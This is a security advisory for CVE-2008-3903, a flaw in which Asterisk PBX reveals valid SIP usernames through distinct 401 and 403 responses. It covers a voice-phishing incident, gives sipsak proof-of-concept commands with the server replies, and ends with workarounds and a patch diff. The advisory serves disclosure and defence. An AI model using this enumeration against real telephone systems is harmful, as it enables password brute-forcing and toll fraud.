CVE-ID: 2008-3903
Author: Stephen A. Misel, Misel Consulting, LLC — steve@miselconsulting.com

Summary: The Asterisk PBX may trivially disclose the validity of a guessed SIP username to unauthorized parties who may then attempt to brute-force a password. If successful, the attacker may be able to access the telephone network. This vector has been successfully exploited in the wild.

Confirmed affected software:

  • Asterisk PBX versions 1.2-1.6 inclusive.
  • Trixbox PBX version 2.6.1 (uses Asterisk).

Suspected affected software:

  • Asterisk PBX - All versions
  • Trixbox PBX - All versions
  • Other projects based upon Asterisk or incorporating Asterisk

On September 2, 2008, Misel Consulting, LLC was asked to investigate potential nefarious activity on a small office Asterisk PBX. Our investigation revealed the credentials of two existing SIP users in the system were in use from an unauthorized outside host. Further investigation revealed the purpose of these calls was to gather credit and debit card details from credit card holders (voice phish).

After contacting the appropriate authorities, we set out to determine how these SIP credentials were compromised. In 2006, John Todd noted the Asterisk PBX can potentially disclose whether a specific SIP user is valid. According to John, a patch was developed for 1.2-TRUNK which added the “alwaysauthreject” option, allowing Asterisk to obscure SIP response codes on INVITE, SUBSCRIBE and REGISTER from 404 to 401 in the case of non-existent SIP hosts.

Unfortunately, this configuration directive may have not gone far enough. Asterisk, at least with Digest authentication, is still capable of confirming the existence of a SIP user with “alwaysauthreject” enabled. A response of “401 Unauthorized” is returned for invalid SIP users, while a “403 Forbidden (Bad auth)” is returned for a valid SIP user with a guessed (bad) password. Armed with this knowledge, it is trivial for an attacker to compile a list of valid SIP usernames. With knowledge of valid usernames, it could then be possible to determine the password with brute-force and gain access to the public telephone network.

Proof-Of-Concept: Using sipsak:

On Asterisk 1.4 with “alwaysauthreject” enabled:
Invalid user with invalid password
% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:testX@192.168.8.234:5060;tag=550fcb06
To: sip:testX@192.168.8.234:5060;tag=as49ef5a0f
Call-ID: 1427098374@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm=”asterisk”, nonce=”70f69171″
Content-Length: 0

Valid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:test@192.168.8.234:5060;tag=4e3b4edd
To: sip:test@192.168.8.234:5060;tag=as305009f4
Call-ID: 1312509661@192.168.111.1
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

On Asterisk 1.4 with “alwaysauthreject” disabled:

Invalid user with invalid password
% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:testX@192.168.8.234:5060;tag=5596ae2f
To: sip:testX@192.168.8.234:5060;tag=as5620a72f
Call-ID: 1435938351@192.168.111.1
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

Valid user with invalid password:
% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:test@192.168.8.234:5060;tag=55aaf11b
To: sip:test@192.168.8.234:5060;tag=as4e3f230d
Call-ID: 1437266203@192.168.1.199
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

Workarounds

  • Use strong SIP usernames and passwords
  • Limit SIP port access to authorized hosts only.
  • Require SIP traffic to traverse a secure VPN.
  • Patch Asterisk to send 401 instead of 403 on bad authentication and enable “alwaysauthreject”.

Patch:

Please note: This patch is experimental, and likely does not adhere to the SIP standard. Use this as a last resort. No guarantees expressed or implied. In order for this patch to work, you must enable “alwaysauthreject”.

% diff -u asterisk-1.4.21.2/channels/chan_sip.c asterisk-1.4.21.2-patch/channels/chan_sip.c

--- asterisk-1.4.21.2/channels/chan_sip.c 2008-06-03 10:46:24.000000000 -0400
+++ asterisk-1.4.21.2-patch/channels/chan_sip.c 2008-09-04 13:23:40.000000000 -0400
@@ -8786,7 +8786,11 @@
switch (res) {
case AUTH_SECRET_FAILED:
/* Wrong password in authentication. Go away, don't try again until you fixed it */
- transmit_response(p, "403 Forbidden (Bad auth)", &p->initreq);
+ if (global_alwaysauthreject) {
+ transmit_fake_auth_response(p, &p->initreq, 1);
+ } else {
+ transmit_response(p, "403 Forbidden (Bad auth)", &p->initreq);
+ }
break;
case AUTH_USERNAME_MISMATCH:
/* Username and digest username does not match.